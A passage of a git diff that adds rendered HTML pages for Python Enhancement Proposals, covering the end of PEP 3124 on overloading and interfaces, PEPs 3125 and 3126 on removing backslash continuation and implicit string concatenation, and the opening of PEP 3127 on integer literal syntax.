+    @abstract
+    def __setitem__(self, key, value):
+        """This has to be implemented"""
+
+    def update(self, other:IReadMapping):
+        for k, v in IReadMapping(other).items():
+            self[k] = v
+
+
+

As long as __setitem__ is defined for some type, the above +interface will provide a usable update() implementation. However, +if some specific type (or pair of types) has a more efficient way of +handling update() operations, an appropriate overload can still +be registered for use in that case.

+
+
+

Subclassing and Re-assembly

+

Interfaces can be subclassed:

+
class ISizedStack(IStack):
+    @abstract
+    def __len__(self):
+        """Return the number of items on the stack"""
+
+# define __len__ support for ISizedStack
+when(ISizedStack.__len__, (list,))(list.__len__)
+
+
+

Or assembled by combining functions from existing interfaces:

+
class Sizable(Interface):
+    __len__ = ISizedStack.__len__
+
+# list now implements Sizable as well as ISizedStack, without
+# making any new declarations!
+
+
+

A class can be considered to “adapt to” an interface at a given +point in time, if no method defined in the interface is guaranteed to +raise a NoApplicableMethods error if invoked on an instance of +that class at that point in time.

+

In normal usage, however, it is “easier to ask forgiveness than +permission”. That is, it is easier to simply use an interface on +an object by adapting it to the interface (e.g. IStack(mylist)) +or invoking interface methods directly (e.g. IStack.push(mylist, +42)), than to try to figure out whether the object is adaptable to +(or directly implements) the interface.

+
+
+

Implementing an Interface in a Class

+

It is possible to declare that a class directly implements an +interface, using the declare_implementation() function:

+
from overloading import declare_implementation
+
+class Stack(object):
+    def __init__(self):
+        self.data = []
+    def push(self, ob):
+        self.data.append(ob)
+    def pop(self):
+        return self.data.pop()
+
+declare_implementation(IStack, Stack)
+
+
+

The declare_implementation() call above is roughly equivalent to +the following steps:

+
when(IStack.push, (Stack,object))(lambda self, ob: self.push(ob))
+when(IStack.pop, (Stack,))(lambda self: self.pop())
+
+
+

That is, calling IStack.push() or IStack.pop() on an instance +of any subclass of Stack, will simply delegate to the actual +push() or pop() methods thereof.

+

For the sake of efficiency, calling IStack(s) where s is an +instance of Stack, may return s rather than an IStack +adapter. (Note that calling IStack(x) where x is already an +IStack adapter will always return x unchanged; this is an +additional optimization allowed in cases where the adaptee is known +to directly implement the interface, without adaptation.)

+

For convenience, it may be useful to declare implementations in the +class header, e.g.:

+
class Stack(metaclass=Implementer, implements=IStack):
+    ...
+
+
+

Instead of calling declare_implementation() after the end of the +suite.

+
+
+

Interfaces as Type Specifiers

+

Interface subclasses can be used as argument annotations to +indicate what type of objects are acceptable to an overload, e.g.:

+
@overload
+def traverse(g: IGraph, s: IStack):
+    g = IGraph(g)
+    s = IStack(s)
+    # etc....
+
+
+

Note, however, that the actual arguments are not changed or adapted +in any way by the mere use of an interface as a type specifier. You +must explicitly cast the objects to the appropriate interface, as +shown above.

+

Note, however, that other patterns of interface use are possible. +For example, other interface implementations might not support +adaptation, or might require that function arguments already be +adapted to the specified interface. So the exact semantics of using +an interface as a type specifier are dependent on the interface +objects you actually use.

+

For the interface objects defined by this PEP, however, the semantics +are as described above. An interface I1 is considered “more specific” +than another interface I2, if the set of descriptors in I1’s +inheritance hierarchy are a proper superset of the descriptors in I2’s +inheritance hierarchy.
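
+

Modelling interfaces as classes, the comparison is a proper-superset test over descriptor names, roughly as follows (invented helper names, glossing over real descriptor discovery):

+
def descriptor_names(iface):
+    names = set()
+    for cls in iface.__mro__:
+        names.update(n for n in vars(cls) if not n.startswith('_'))
+    return names
+
+def iface_more_specific(i1, i2):
+    return descriptor_names(i1) > descriptor_names(i2)  # proper superset
+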

+

So, for example, ISizedStack is more specific than both Sizable and IStack, irrespective of the inheritance relationships between these interfaces. It is purely a question of what operations are included within those interfaces – and the names of the operations are unimportant.

+

Interfaces (at least the ones provided by overloading) are always +considered less-specific than concrete classes. Other interface +implementations can decide on their own specificity rules, both +between interfaces and other interfaces, and between interfaces and +classes.

+
+
+

Non-Method Attributes in Interfaces

+

The Interface implementation actually treats all attributes and +methods (i.e. descriptors) in the same way: their __get__ (and +__set__ and __delete__, if present) methods are called with +the wrapped (adapted) object as “self”. For functions, this has the +effect of creating a bound method linking the generic function to the +wrapped object.

+

For non-function attributes, it may be easiest to specify them using +the property built-in, and the corresponding fget, fset, +and fdel attributes:

+
class ILength(Interface):
+    @property
+    @abstract
+    def length(self):
+        """Read-only length attribute"""
+
+# ILength(aList).length == list.__len__(aList)
+when(ILength.length.fget, (list,))(list.__len__)
+
+
+

Alternatively, methods such as _get_foo() and _set_foo() +may be defined as part of the interface, and the property defined +in terms of those methods, but this is a bit more difficult for users +to implement correctly when creating a class that directly implements +the interface, as they would then need to match all the individual +method names, not just the name of the property or attribute.

+
+
+
+

Aspects

+

The adaptation system described above assumes that adapters are “stateless”, +which is to say that adapters have no attributes or state apart from +that of the adapted object. This follows the “typeclass/instance” +model of Haskell, and the concept of “pure” (i.e., transitively +composable) adapters.

+

However, there are occasionally cases where, to provide a complete +implementation of some interface, some sort of additional state is +required.

+

One possibility of course, would be to attach monkeypatched “private” +attributes to the adaptee. But this is subject to name collisions, +and complicates the process of initialization (since any code using +these attributes has to check for their existence and initialize them +if necessary). It also doesn’t work on objects that don’t have a +__dict__ attribute.

+

So the Aspect class is provided to make it easy to attach extra +information to objects that either:

+
1. have a __dict__ attribute (so aspect instances can be stored in it, keyed by aspect class),
2. support weak referencing (so aspect instances can be managed using a global but thread-safe weak-reference dictionary), or
3. implement or can be adapted to the overloading.IAspectOwner interface (technically, #1 or #2 imply this).
+

Subclassing Aspect creates an adapter class whose state is tied +to the life of the adapted object.
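
+

A rough sketch of the weak-reference strategy (item 2 in the list above) follows; the registry name is invented, and a real implementation would also need the __dict__ and IAspectOwner paths, plus a guard against re-running __init__:

+
import weakref
+
+_aspects = weakref.WeakKeyDictionary()   # subject -> {aspect class: instance}
+
+class AspectSketch:
+    def __new__(cls, subject):
+        per_subject = _aspects.setdefault(subject, {})
+        if cls not in per_subject:
+            per_subject[cls] = super().__new__(cls)
+        return per_subject[cls]
+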

+

For example, suppose you would like to count all the times a certain +method is called on instances of Target (a classic AOP example). +You might do something like:

+
from overloading import Aspect
+
+class Count(Aspect):
+    count = 0
+
+@after(Target.some_method)
+def count_after_call(self:Target, *args, **kw):
+    Count(self).count += 1
+
+
+

The above code will keep track of the number of times that +Target.some_method() is successfully called on an instance of +Target (i.e., it will not count errors unless they occur in a +more-specific “after” method). Other code can then access the count +using Count(someTarget).count.

+

Aspect instances can of course have __init__ methods, to +initialize any data structures. They can use either __slots__ +or dictionary-based attributes for storage.

+

While this facility is rather primitive compared to a full-featured +AOP tool like AspectJ, persons who wish to build pointcut libraries +or other AspectJ-like features can certainly use Aspect objects +and method-combination decorators as a base for building more +expressive AOP tools.

+
+
XXX spec out full aspect API, including keys, N-to-1 aspects, manual
attach/detach/delete of aspect instances, and the IAspectOwner +interface.
+
+
+
+
+

Extension API

+

TODO: explain how all of these work

+

implies(o1, o2)

+

declare_implementation(iface, class)

+

predicate_signatures(ob)

+

parse_rule(ruleset, body, predicate, actiontype, localdict, globaldict)

+

combine_actions(a1, a2)

+

rules_for(f)

+

Rule objects

+

ActionDef objects

+

RuleSet objects

+

Method objects

+

MethodList objects

+

IAspectOwner

+
+
+

Overloading Usage Patterns

+

In discussion on the Python-3000 list, the proposed feature of allowing +arbitrary functions to be overloaded has been somewhat controversial, +with some people expressing concern that this would make programs more +difficult to understand.

+

The general thrust of this argument is that one cannot rely on what a +function does, if it can be changed from anywhere in the program at any +time. Even though in principle this can already happen through +monkeypatching or code substitution, it is considered poor practice to +do so.

+

However, providing support for overloading any function (or so the +argument goes), is implicitly blessing such changes as being an +acceptable practice.

+

This argument appears to make sense in theory, but it is almost entirely +mooted in practice for two reasons.

+

First, people are generally not perverse, defining a function to do one +thing in one place, and then summarily defining it to do the opposite +somewhere else! The principal reasons to extend the behavior of a +function that has not been specifically made generic are to:

+
• Add special cases not contemplated by the original function’s author, such as support for additional types.
• Be notified of an action in order to cause some related operation to be performed, either before the original operation is performed, after it, or both. This can include general-purpose operations like adding logging, timing, or tracing, as well as application-specific behavior.
+

None of these reasons for adding overloads imply any change to the +intended default or overall behavior of the existing function, however. +Just as a base class method may be overridden by a subclass for these +same two reasons, so too may a function be overloaded to provide for +such enhancements.

+

In other words, universal overloading does not equal arbitrary +overloading, in the sense that we need not expect people to randomly +redefine the behavior of existing functions in illogical or +unpredictable ways. If they did so, it would be no less of a bad +practice than any other way of writing illogical or unpredictable code!

+

However, to distinguish bad practice from good, it is perhaps necessary +to clarify further what good practice for defining overloads is. And +that brings us to the second reason why generic functions do not +necessarily make programs harder to understand: overloading patterns in +actual programs tend to follow very predictable patterns. (Both in +Python and in languages that have no non-generic functions.)

+

If a module is defining a new generic operation, it will usually also +define any required overloads for existing types in the same place. +Likewise, if a module is defining a new type, then it will usually +define overloads there for any generic functions that it knows or cares +about.

+

As a result, the vast majority of overloads can be found adjacent to +either the function being overloaded, or to a newly-defined type for +which the overload is adding support. Thus, overloads are +highly-discoverable in the common case, as you are either looking at the +function or the type, or both.

+

It is only in rather infrequent cases that one will have overloads in a +module that contains neither the function nor the type(s) for which the +overload is added. This would be the case if, say, a third-party +created a bridge of support between one library’s types and another +library’s generic function(s). In such a case, however, best practice +suggests prominently advertising this, especially by way of the module +name.

+

For example, PyProtocols defines such bridge support for working with +Zope interfaces and legacy Twisted interfaces, using modules called +protocols.twisted_support and protocols.zope_support. (These +bridges are done with interface adapters, rather than generic functions, +but the basic principle is the same.)

+

In short, understanding programs in the presence of universal +overloading need not be any more difficult, given that the vast majority +of overloads will either be adjacent to a function, or the definition of +a type that is passed to that function.

+

And, in the absence of incompetence or deliberate intention to be +obscure, the few overloads that are not adjacent to the relevant type(s) +or function(s), will generally not need to be understood or known about +outside the scope where those overloads are defined. (Except in the +“support modules” case, where best practice suggests naming them +accordingly.)

+
+
+

Implementation Notes

+

Most of the functionality described in this PEP is already implemented +in the in-development version of the PEAK-Rules framework. In +particular, the basic overloading and method combination framework +(minus the @overload decorator) already exists there. The +implementation of all of these features in peak.rules.core is 656 +lines of Python at this writing.

+

peak.rules.core currently relies on the DecoratorTools and BytecodeAssembler modules, but both of these dependencies can be replaced, as DecoratorTools is used mainly for Python 2.3 compatibility and to implement structure types (which can be done with named tuples in later versions of Python). The use of BytecodeAssembler can be replaced using an “exec” or “compile” workaround, given a reasonable effort. (It would be easier to do this if the func_closure attribute of function objects were writable.)

+
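For instance, a simple structure type of the kind DecoratorTools provides can be expressed with collections.namedtuple (available since Python 2.6); this is only a sketch of the suggested replacement, not code from PEAK-Rules, and the field names are hypothetical:

from collections import namedtuple

# A lightweight record: named, immutable fields with positional
# construction and a generated repr.
Rule = namedtuple("Rule", ["predicate", "action", "priority"])

r = Rule(predicate=lambda x: x > 0, action=print, priority=10)
print(r.priority)              # 10
print(r._replace(priority=0))  # copy with one field changed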

The Interface class has been previously prototyped, but is not +included in PEAK-Rules at the present time.

+

The “implicit class rule” has previously been implemented in the RuleDispatch library. However, it relies on the __metaclass__ hook, which is eliminated by PEP 3115.

+

I don’t currently know how to make @overload play nicely with +classmethod and staticmethod in class bodies. It’s not really +clear if it needs to, however.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3124.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3125/index.html b/pep-3125/index.html
new file mode 100644
index 00000000000..0bd8e2b14d2
--- /dev/null
+++ b/pep-3125/index.html
@@ -0,0 +1,353 @@
PEP 3125 – Remove Backslash Continuation | peps.python.org
+
+


+ + +
+
+
+

PEP 3125 – Remove Backslash Continuation

+
+
Author:
+
Jim J. Jewett <JimJJewett at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Apr-2007
+
Post-History:
+
29-Apr-2007, 30-Apr-2007, 04-May-2007
+
+
+
+
+
+

Rejection Notice

+

This PEP is rejected. There wasn’t enough support in favor, the +feature to be removed isn’t all that harmful, and there are some use +cases that would become harder.

+
+
+

Abstract

+

Python initially inherited its parsing from C. While this has been +generally useful, there are some remnants which have been less useful +for Python, and should be eliminated.

+

This PEP proposes elimination of terminal \ as a marker for line +continuation.

+
+
+

Motivation

+

One goal for Python 3000 should be to simplify the language by +removing unnecessary or duplicated features. There are currently +several ways to indicate that a logical line is continued on the +following physical line.

+

The other continuation methods are easily explained as a logical +consequence of the semantics they provide; \ is simply an escape +character that needs to be memorized.

+
+
+

Existing Line Continuation Methods

+
+

Parenthetical Expression - ([{}])

+

Open a parenthetical expression. It doesn’t matter whether people +view the “line” as continuing; they do immediately recognize that the +expression needs to be closed before the statement can end.

+

Examples using each of (), [], and {}:

+
def fn(long_argname1,
+       long_argname2):
+    settings = {"background": "random noise",
+                "volume": "barely audible"}
+    restrictions = ["Warrantee void if used",
+                    "Notice must be received by yesterday",
+                    "Not responsible for sales pitch"]
+
+
+

Note that it is always possible to parenthesize an expression, but it +can seem odd to parenthesize an expression that needs parentheses only +for the line break:

+
assert val>4, (
+    "val is too small")
+
+
+
+
+

Triple-Quoted Strings

+

Open a triple-quoted string; again, people recognize that the string +needs to finish before the next statement starts.

+
banner_message = """
+    Satisfaction Guaranteed,
+    or DOUBLE YOUR MONEY BACK!!!
+
+
+
+
+
+                                    some minor restrictions apply"""
+
+
+
+
+

Terminal \ in the general case

+

A terminal \ indicates that the logical line is continued on the +following physical line (after whitespace). There are no particular +semantics associated with this. This form is never required, although +it may look better (particularly for people with a C language +background) in some cases:

+
>>> assert val>4, \
+        "val is too small"
+
+
+

Also note that the \ must be the final character in the line. If +your editor navigation can add whitespace to the end of a line, that +invisible change will alter the semantics of the program. +Fortunately, the typical result is only a syntax error, rather than a +runtime bug:

+
>>> assert val>4, \
+        "val is too small"
+
+SyntaxError: unexpected character after line continuation character
+
+
+

This PEP proposes to eliminate this redundant and potentially +confusing alternative.

+
+
+

Terminal \ within a string

+

A terminal \ within a single-quoted string, at the end of the +line. This is arguably a special case of the terminal \, but it +is a special case that may be worth keeping.

+
>>> "abd\
+ def"
+'abd def'
+
+
+
    +
  • Pro: Many of the objections to removing \ termination were +really just objections to removing it within literal strings; +several people clarified that they want to keep this literal-string +usage, but don’t mind losing the general case.
  • +
  • Pro: The use of \ for an escape character within strings is well +known.
  • +
  • Contra: But note that this particular usage is odd, because the +escaped character (the newline) is invisible, and the special +treatment is to delete the character. That said, the \ of +\(newline) is still an escape which changes the meaning of the +following character.
  • +
+
+
+
+

Alternate Proposals

+

Several people have suggested alternative ways of marking the line +end. Most of these were rejected for not actually simplifying things.

+

The one exception was to let any unfinished expression signify a line +continuation, possibly in conjunction with increased indentation.

+

This is attractive because it is a generalization of the rule for +parentheses.

+

The initial objections to this were:

+
    +
  • The amount of whitespace may be contentious; expression continuation +should not be confused with opening a new suite.
  • +
  • The “expression continuation” markers are not as clearly marked in +Python as the grouping punctuation “(), [], {}” marks are:
    # Plus needs another operand, so the line continues
    +"abc" +
    +    "def"
    +
    +# String ends an expression, so the line does
    +# not continue.  The next line is a syntax error because
    +# unary plus does not apply to strings.
    +"abc"
    +    + "def"
    +
    +
    +
  • +
  • Guido objected for technical reasons. [1] The most obvious +implementation would require allowing INDENT or DEDENT tokens +anywhere, or at least in a widely expanded (and ill-defined) set of +locations. While this is of concern only for the internal parsing +mechanism (rather than for users), it would be a major new source of +complexity.
  • +
+

Andrew Koenig then pointed out [2] a better implementation +strategy, and said that it had worked quite well in other +languages. [3] The improved suggestion boiled down to:

+
+
The whitespace that follows an (operator or) open bracket or +parenthesis can include newline characters.

It would be implemented at a very low lexical level – even before +the decision is made to turn a newline followed by spaces into an +INDENT or DEDENT token.

+
+

There is still some concern that it could mask bugs, as in this +example [4]:

+
# Used to be y+1, the 1 got dropped.  Syntax Error (today)
+# would become nonsense.
+x = y+
+f(x)
+
+
+

Requiring that the continuation be indented more than the initial line +would add both safety and complexity.

+
+
+

Open Issues

+
    +
  • Should \-continuation be removed even inside strings?
  • +
  • Should the continuation markers be expanded from just ([{}]) to +include lines ending with an operator?
  • +
  • As a safety measure, should the continuation line be required to be +more indented than the initial line?
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3125.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3126/index.html b/pep-3126/index.html
new file mode 100644
index 00000000000..1ae28955a0d
--- /dev/null
+++ b/pep-3126/index.html
@@ -0,0 +1,505 @@
PEP 3126 – Remove Implicit String Concatenation | peps.python.org
+
+


+ + +
+
+
+

PEP 3126 – Remove Implicit String Concatenation

+
+
Author:
+
Jim J. Jewett <JimJJewett at gmail.com>, +Raymond Hettinger <python at rcn.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Apr-2007
+
Post-History:
+
29-Apr-2007, 30-Apr-2007, 07-May-2007
+
+
+
+
+
+

Rejection Notice

+

This PEP is rejected. There wasn’t enough support in favor, the +feature to be removed isn’t all that harmful, and there are some use +cases that would become harder.

+
+
+

Abstract

+

Python inherited many of its parsing rules from C. While this has been generally useful, there are some individual rules which are less useful for Python, and should be eliminated.

+

This PEP proposes to eliminate implicit string concatenation based +only on the adjacency of literals.

+

Instead of:

+
"abc" "def" == "abcdef"
+
+
+

authors will need to be explicit, and either add the strings:

+
"abc" + "def" == "abcdef"
+
+
+

or join them:

+
"".join(["abc", "def"]) == "abcdef"
+
+
+
+
+

Motivation

+

One goal for Python 3000 should be to simplify the language by +removing unnecessary features. Implicit string concatenation should +be dropped in favor of existing techniques. This will simplify the +grammar and simplify a user’s mental picture of Python. The latter is +important for letting the language “fit in your head”. A large group +of current users do not even know about implicit concatenation. Of +those who do know about it, a large portion never use it or habitually +avoid it. Of those who both know about it and use it, very few could +state with confidence the implicit operator precedence and under what +circumstances it is computed when the definition is compiled versus +when it is run.

+
+

History or Future

+

Many Python parsing rules are intentionally compatible with C. This is a useful default, but special cases need to be justified based on their utility in Python. We should no longer assume that Python programmers will also be familiar with C, so compatibility between languages should be treated as a tie-breaker, rather than a justification.

+

In C, implicit concatenation is the only way to join strings without using a (run-time) function call to store into a variable. In Python, the strings can be joined (and still recognized as immutable) using more standard Python idioms, such as + or "".join.

+
+
+

Problem

+

Implicit string concatenation leads to tuples and lists which are shorter than they appear; this in turn can lead to confusing, or even silent, errors. For example, given a function which accepts several parameters, but offers a default value for some of them:

+
def f(fmt, *args):
+    print fmt % args
+
+
+

This looks like a valid call, but isn’t:

+
>>> f("User %s got a message %s",
+      "Bob"
+      "Time for dinner")
+
+Traceback (most recent call last):
+  File "<pyshell#8>", line 2, in <module>
+    "Bob"
+  File "<pyshell#3>", line 2, in f
+    print fmt % args
+TypeError: not enough arguments for format string
+
+
+

Calls to this function can silently do the wrong thing:

+
def g(arg1, arg2=None):
+    ...
+
+# silently transformed into the possibly very different
+# g("arg1 on this linearg2 on this line", None)
+g("arg1 on this line"
+  "arg2 on this line")
+
+
+

To quote Jason Orendorff:

+
+
Oh. I just realized this happens a lot out here. Where I work, +we use scons, and each SConscript has a long list of filenames:
sourceFiles = [
+    'foo.c'
+    'bar.c',
+    #...many lines omitted...
+    'q1000x.c']
+
+
+

It’s a common mistake to leave off a comma, and then scons +complains that it can’t find ‘foo.cbar.c’. This is pretty +bewildering behavior even if you are a Python programmer, +and not everyone here is.

+
+
+
+
+

Solution

+

In Python, strings are objects and they support the __add__ operator, +so it is possible to write:

+
"abc" + "def"
+
+
+

Because these are literals, this addition can still be optimized away +by the compiler; the CPython compiler already does so. +[2]

+
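One way to observe the folding, for the curious (the exact bytecode varies by CPython version):

import dis

# The two literals are folded into a single constant at compile time,
# so no concatenation happens at runtime.
dis.dis(compile('"abc" + "def"', "<demo>", "eval"))
# e.g.  0 LOAD_CONST   0 ('abcdef')
#       2 RETURN_VALUE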

Other existing alternatives include multiline (triple-quoted) strings, +and the join method:

+
"""This string
+   extends across
+   multiple lines, but you may want to use something like
+   textwrap.dedent
+   to clear out the leading spaces
+   and/or reformat.
+"""
+
+
+>>> "".join(["empty", "string", "joiner"]) == "emptystringjoiner"
+True
+
+>>> " ".join(["space", "string", "joiner"]) == "space string joiner"
+True
+
+>>> "\n".join(["multiple", "lines"]) == "multiple\nlines" == (
+"""multiple
+lines""")
+True
+
+
+
+
+

Concerns

+
+

Operator Precedence

+

Guido indicated [2] that this change should be handled by a PEP, because there were a few edge cases with other string operators, such as the %. (Assuming that str % stays – it may be eliminated in favor of PEP 3101 – Advanced String Formatting. [3])

+

The resolution is to use parentheses to enforce precedence – the same +solution that can be used today:

+
# Clearest, works today, continues to work, optimization is
+# already possible.
+("abc %s def" + "ghi") % var
+
+# Already works today; precedence makes the optimization more
+# difficult to recognize, but does not change the semantics.
+"abc" + "def %s ghi" % var
+
+
+

as opposed to:

+
# Already fails because modulus (%) is higher precedence than
+# addition (+)
+("abc %s def" + "ghi" % var)
+
+# Works today only because adjacency is higher precedence than
+# modulus.  This will no longer be available.
+"abc %s" "def" % var
+
+# So the 2-to-3 translator can automatically replace it with the
+# (already valid):
+("abc %s" + "def") % var
+
+
+
+
+

Long Commands

+
+
… build up (what I consider to be) readable SQL queries [4]:
rows = self.executesql("select cities.city, state, country"
+                       "    from cities, venues, events, addresses"
+                       "    where cities.city like %s"
+                       "      and events.active = 1"
+                       "      and venues.address = addresses.id"
+                       "      and addresses.city = cities.id"
+                       "      and events.venue = venues.id",
+                       (city,))
+
+
+
+

Alternatives again include triple-quoted strings, +, and .join:

+
query="""select cities.city, state, country
+             from cities, venues, events, addresses
+             where cities.city like %s
+               and events.active = 1"
+               and venues.address = addresses.id
+               and addresses.city = cities.id
+               and events.venue = venues.id"""
+
+query=( "select cities.city, state, country"
+      + "    from cities, venues, events, addresses"
+      + "    where cities.city like %s"
+      + "      and events.active = 1"
+      + "      and venues.address = addresses.id"
+      + "      and addresses.city = cities.id"
+      + "      and events.venue = venues.id"
+      )
+
+query="\n".join(["select cities.city, state, country",
+                 "    from cities, venues, events, addresses",
+                 "    where cities.city like %s",
+                 "      and events.active = 1",
+                 "      and venues.address = addresses.id",
+                 "      and addresses.city = cities.id",
+                 "      and events.venue = venues.id"])
+
+# And yes, you *could* inline any of the above querystrings
+# the same way the original was inlined.
+rows = self.executesql(query, (city,))
+
+
+
+
+

Regular Expressions

+

Complex regular expressions are sometimes stated in terms of several implicitly concatenated strings with each regex component on a different line and followed by a comment. The plus operator can be inserted here but it does make the regex harder to read. One alternative is to use the re.VERBOSE option. Another alternative is to build up the regex with a series of += lines:

+
# Existing idiom which relies on implicit concatenation
+r = ('a{20}'  # Twenty A's
+     'b{5}'   # Followed by Five B's
+     )
+
+# Mechanical replacement
+r = ('a{20}'  +# Twenty A's
+     'b{5}'   # Followed by Five B's
+     )
+
+# already works today
+r = '''a{20}  # Twenty A's
+       b{5}   # Followed by Five B's
+    '''                 # Compiled with the re.VERBOSE flag
+
+# already works today
+r = 'a{20}'   # Twenty A's
+r += 'b{5}'   # Followed by Five B's
+
+
+
+
+

Internationalization

+

Some internationalization tools – notably xgettext – have already +been special-cased for implicit concatenation, but not for Python’s +explicit concatenation. [5]

+

These tools will fail to extract the (already legal):

+
_("some string" +
+  " and more of it")
+
+
+

but often have a special case for:

+
_("some string"
+  " and more of it")
+
+
+

It should also be possible to just use an overly long line (xgettext +limits messages to 2048 characters [7], which is less +than Python’s enforced limit) or triple-quoted strings, but these +solutions sacrifice some readability in the code:

+
# Lines over a certain length are unpleasant.
+_("some string and more of it")
+
+# Changing whitespace is not ideal.
+_("""Some string
+     and more of it""")
+_("""Some string
+and more of it""")
+_("Some string \
+and more of it")
+
+
+

I do not see a good short-term resolution for this.

+
+
+
+

Transition

+

The proposed new constructs are already legal in current Python, and +can be used immediately.

+

The 2 to 3 translator can be made to mechanically change:

+
"str1" "str2"
+("line1"  #comment
+ "line2")
+
+
+

into:

+
("str1" + "str2")
+("line1"   +#comments
+ "line2")
+
+
+

If users want to use one of the other idioms, they can; as these idioms are all already legal in Python 2, the edits can be made to the original source, rather than patching up the translator.

+
+
+

Open Issues

+

Is there a better way to support external text extraction tools, or at +least xgettext [6] in particular?

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3126.rst

+

Last modified: 2024-09-20 05:59:07 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3127/index.html b/pep-3127/index.html
new file mode 100644
index 00000000000..5f21d625fdd
--- /dev/null
+++ b/pep-3127/index.html
@@ -0,0 +1,601 @@
PEP 3127 – Integer Literal Support and Syntax | peps.python.org
+
+


+ + +
+
+
+

PEP 3127 – Integer Literal Support and Syntax

+
+
Author:
+
Patrick Maupin <pmaupin at gmail.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+
18-Mar-2007
+
+
+
+
+
+

Abstract

+

This PEP proposes changes to the Python core to rationalize +the treatment of string literal representations of integers +in different radices (bases). These changes are targeted at +Python 3.0, but the backward-compatible parts of the changes +should be added to Python 2.6, so that all valid 3.0 integer +literals will also be valid in 2.6.

+

The proposal is that:

+
    +
  1. octal literals must now be specified +with a leading “0o” or “0O” instead of “0”;
  2. +
  3. binary literals are now supported via a +leading “0b” or “0B”; and
  4. +
  5. provision will be made for binary numbers in +string formatting.
  6. +
+
+
+

Motivation

+

This PEP was motivated by two different issues:

+
    +
  • The default octal representation of integers is silently confusing +to people unfamiliar with C-like languages. It is extremely easy +to inadvertently create an integer object with the wrong value, +because ‘013’ means ‘decimal 11’, not ‘decimal 13’, to the Python +language itself, which is not the meaning that most humans would +assign to this literal.
  • +
  • Some Python users have a strong desire for binary support in +the language.
  • +
+
+
+

Specification

+
+

Grammar specification

+

The grammar will be changed. For Python 2.6, the changed and +new token definitions will be:

+
integer        ::=     decimalinteger | octinteger | hexinteger |
+                       bininteger | oldoctinteger
+
+octinteger     ::=     "0" ("o" | "O") octdigit+
+
+bininteger     ::=     "0" ("b" | "B") bindigit+
+
+oldoctinteger  ::=     "0" octdigit+
+
+bindigit       ::=     "0" | "1"
+
+
+

For Python 3.0, “oldoctinteger” will not be supported, and +an exception will be raised if a literal has a leading “0” and +a second character which is a digit.

+
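Concretely, the accepted and rejected spellings behave as follows in Python 3, where this proposal was ultimately implemented:

print(0o777)   # 511 -- new octal spelling
print(0O17)    # 15  -- uppercase prefix letter is also legal
print(0b1010)  # 10  -- new binary literals
print(0B1)     # 1

# The old spelling is now a syntax error:
#   >>> 010
#   SyntaxError: ...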

For both versions, this will require changes to PyLong_FromString +as well as the grammar.

+

The documentation will have to be changed as well: grammar.txt, +as well as the integer literal section of the reference manual.

+

PEP 306 should be checked for other issues, and that PEP should +be updated if the procedure described therein is insufficient.

+
+
+

int() specification

+

int(s, 0) will also match the new grammar definition.

+

This should happen automatically with the changes to +PyLong_FromString required for the grammar change.

+
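A short illustration of the base-zero behavior as it works in Python 3:

print(int("0o755", 0))  # 493 -- the prefix selects the radix
print(int("0b101", 0))  # 5
print(int("0x1f", 0))   # 31
print(int("755", 0))    # 755 -- no prefix means decimal

try:
    int("0755", 0)      # old-style octal no longer matches
except ValueError as exc:
    print(exc)          # invalid literal for int() with base 0: '0755'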

Also the documentation for int() should be changed to explain +that int(s) operates identically to int(s, 10), and the word +“guess” should be removed from the description of int(s, 0).

+
+
+

long() specification

+

For Python 2.6, the long() implementation and documentation +should be changed to reflect the new grammar.

+
+
+

Tokenizer exception handling

+

If an invalid token contains a leading “0”, the exception +error message should be more informative than the current +“SyntaxError: invalid token”. It should explain that decimal +numbers may not have a leading zero, and that octal numbers +require an “o” after the leading zero.

+
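For what it is worth, recent CPython releases do report something along these lines; the exact wording below is from newer 3.x versions and has varied over time (older releases said merely “invalid token”):

>>> x = 0755
  File "<stdin>", line 1
    x = 0755
        ^
SyntaxError: leading zeros in decimal integer literals are not
permitted; use an 0o prefix for octal integers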
+
+

int() exception handling

+

The ValueError raised for any call to int() with a string +should at least explicitly contain the base in the error +message, e.g.:

+
ValueError: invalid literal for base 8 int(): 09
+
+
+
+
+

oct() function

+

oct() should be updated to output ‘0o’ in front of +the octal digits (for 3.0, and 2.6 compatibility mode).

+
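That is, in Python 3:

print(oct(511))  # 0o777
print(oct(8))    # 0o10
print(oct(-8))   # -0o10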
+
+

Output formatting

+

In 3.0, the string % operator alternate syntax for the ‘o’ +option will need to be updated to add ‘0o’ in front, +instead of ‘0’. In 2.6, alternate octal formatting will +continue to add only ‘0’. In neither 2.6 nor 3.0 will +the % operator support binary output. This is because +binary output is already supported by PEP 3101 +(str.format), which is the preferred string formatting +method.

+
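A small sketch of the resulting Python 3 behavior; binary goes through the PEP 3101 format() machinery rather than the % operator:

print('%#o' % 8)          # 0o10  -- the alternate octal form adds "0o"
print('%o' % 8)           # 10    -- the plain form is unchanged
print(format(5, '#b'))    # 0b101 -- binary via PEP 3101 formatting
print('{0:b}'.format(5))  # 101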
+
+

Transition from 2.6 to 3.0

+

The 2to3 translator will have to insert ‘o’ into any octal integer literal.

+

The Py3K compatible option to Python 2.6 should cause +attempts to use oldoctinteger literals to raise an +exception.

+
+
+
+

Rationale

+

Most of the discussion on these issues occurred on the Python-3000 +mailing list starting 14-Mar-2007, prompted by an observation that +the average human being would be completely mystified upon finding +that prepending a “0” to a string of digits changes the meaning of +that digit string entirely.

+

It was pointed out during this discussion that a similar, but shorter, +discussion on the subject occurred in January 2006, prompted by a +discovery of the same issue.

+
+

Background

+

For historical reasons, Python’s string representation of integers +in different bases (radices), for string formatting and token +literals, borrows heavily from C. [1] [2] Usage has shown that +the historical method of specifying an octal number is confusing, +and also that it would be nice to have additional support for binary +literals.

+

Throughout this document, unless otherwise noted, discussions about +the string representation of integers relate to these features:

+
    +
  • Literal integer tokens, as used by normal module compilation, +by eval(), and by int(token, 0). (int(token) and int(token, 2-36) +are not modified by this proposal.)
      +
